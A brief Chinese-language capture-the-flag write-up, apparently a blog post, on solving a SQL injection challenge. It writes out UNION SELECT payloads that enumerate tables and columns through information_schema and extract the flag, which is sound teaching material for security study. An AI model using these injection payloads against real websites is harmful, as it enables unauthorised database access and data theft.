首先知道该页面存在sql注入漏洞。
先判断是否存在注入点。发现是单引号闭合注入。
通过页面回显信息判断当前列数

判断页面中可以回显的点

爆库名

使用命令:0’ union select table_name,2,3,4 from information_schema.tables where table_schema=‘skctf_flag’#爆表名

使用命令‘:0’ union select column_name,2,3,4 from information_schema.columns where table_name=‘fl4g’#
成功拿到列名

拿到表名和列名后,查询:0’ union select 2,skctf_flag,4,3 from fl4g#

成功拿到flag。
相关文章:
-
2021-06-11
-
2021-10-28
-
2022-12-23
-
2021-08-11
-
2021-11-30
-
2022-01-02
-
2021-10-31
-
2021-05-30
猜你喜欢
-
2021-08-18
-
2021-08-11
-
2021-09-23
-
2022-02-18
-
2022-02-01
-
2022-01-29
-
2022-12-23
相关资源
-
下载
2022-12-27
-
下载
2023-02-07
-
下载
2023-02-10
-
下载
2022-12-05
-
下载
2022-12-19